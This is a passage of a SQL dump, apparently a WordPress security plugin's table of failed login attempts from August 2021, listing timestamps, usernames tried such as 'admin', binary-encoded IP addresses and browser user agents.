Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2744,5004,1628766534.726185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̈�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2745,5005,1628766692.539984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(2746,5006,1628766921.338652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2747,5008,1628768425.844787,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(2748,5009,1628768473.581630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2749,5010,1628770162.641638,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'),(2750,5012,1628773382.661029,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2751,5012,1628773382.708740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����X�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2752,5016,1628774624.769213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t>f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2753,5016,1628774624.846870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t>f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2754,5018,1628775384.580108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dd@','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(2755,5020,1628775870.941363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2756,5021,1628776262.438963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wS�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2757,5023,1628777104.653212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2758,5024,1628777123.137420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2759,5026,1628777905.975105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2760,5029,1628779164.225375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2761,5031,1628779993.158075,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[L=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2762,5032,1628780623.611946,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(2763,5033,1628780792.633406,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2764,5035,1628781597.626401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2765,5036,1628781988.420629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2766,5038,1628782384.877468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>p{','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(2767,5039,1628782773.214410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2768,5041,1628783553.791259,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2769,5046,1628785527.609011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2770,5047,1628785901.704149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(2771,5048,1628785918.871126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2772,5050,1628786713.755583,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2773,5051,1628787034.402300,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2774,5054,1628787671.319434,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2775,5055,1628787788.482489,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\\�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2776,5057,1628788197.494024,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2777,5058,1628788274.749203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gyY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2778,5058,1628788274.792174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gyY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2779,5059,1628788574.928572,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���i\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2780,5060,1628788663.293363,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2781,5061,1628789035.187302,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��|��+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2782,5062,1628789447.483619,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Go','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2783,5063,1628789830.072499,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���[]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2784,5064,1628789840.602892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2785,5066,1628790254.867875,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2786,5067,1628790636.112579,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2787,5068,1628790657.278894,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���i\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2788,5069,1628791237.316000,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(2789,5071,1628792369.838800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2790,5072,1628792820.489583,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���cL\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2791,5073,1628793290.478595,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2792,5074,1628793670.066289,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2793,5075,1628794096.099743,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2794,5076,1628794168.511796,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2795,5077,1628794480.349762,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z	A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2796,5078,1628794559.739403,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xO�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2797,5079,1628794927.915366,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2798,5080,1628795322.892835,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2799,5081,1628796098.956342,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��n- ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2800,5082,1628796643.754917,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2801,5084,1628797491.044896,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2802,5085,1628797912.645847,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2803,5088,1628799557.388696,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2804,5090,1628800394.587298,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2805,5091,1628800841.401013,1,'loginFailInvalidUsername','johnmiller83',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2806,5093,1628801934.877658,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2807,5094,1628802593.152038,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2808,5095,1628803379.797244,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���[]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2809,5096,1628803827.806230,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2810,5097,1628804250.926600,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2811,5098,1628804712.844961,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2812,5099,1628805559.947935,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g*o;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2813,5101,1628806047.937511,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2814,5102,1628806454.953897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2815,5103,1628806479.572822,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2816,5103,1628806479.623856,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2817,5104,1628806850.145708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2818,5105,1628806868.355422,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ZE�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2819,5107,1628807361.940669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��RЧE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2820,5108,1628807695.483508,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ng8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2821,5109,1628807744.047052,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��n- ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2822,5110,1628808155.433078,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2823,5111,1628808181.224087,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2824,5112,1628808593.173440,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���i\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2825,5113,1628808616.497361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2826,5114,1628809041.748700,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2827,5115,1628809077.630588,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2828,5116,1628809475.788386,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���n�q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2829,5117,1628809487.017252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cN�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2830,5120,1628810321.890854,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ˉsq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2831,5121,1628810404.302860,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2832,5122,1628810746.275066,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2833,5123,1628811330.768710,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2834,5124,1628811600.270246,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3QJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2835,5126,1628812017.010010,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��tʡ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2836,5129,1628812926.615554,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2837,5130,1628813260.686866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2838,5130,1628813260.711768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2839,5131,1628813326.839306,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2840,5133,1628813778.041714,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ˉsq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2841,5134,1628814186.890533,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2842,5135,1628814207.168385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|\\O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2843,5136,1628814651.104515,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2844,5138,1628814986.699428,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��͹u�','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; AskTB5.6)'),(2845,5141,1628815547.806975,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���!ƫ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2846,5142,1628815696.899604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2847,5143,1628815978.304130,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2848,5144,1628816369.083044,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2849,5145,1628816687.218415,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2850,5146,1628816806.568922,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2851,5148,1628817664.634603,1,'loginFailInvalidUsername','dsa',0,'\0\0\0\0\0\0\0\0\0\0��vz^','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2852,5150,1628818220.828217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2853,5151,1628818531.822966,1,'loginFailInvalidUsername','enamad',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2854,5152,1628818741.899486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2855,5153,1628818973.763131,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"I�w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2856,5154,1628819268.383648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2857,5155,1628819497.757353,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2858,5156,1628819807.309756,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2859,5157,1628820263.299134,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��R�x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2860,5160,1628821143.058681,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2861,5161,1628821929.090800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2862,5163,1628822409.453745,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2863,5164,1628822667.145815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2864,5165,1628822872.154330,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2865,5166,1628823004.368797,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2866,5167,1628823309.401089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2867,5168,1628823650.557113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2868,5171,1628824190.565775,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���	�C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2869,5172,1628824295.255541,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2870,5173,1628824632.152246,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g|^,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2871,5174,1628824951.419039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ּ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 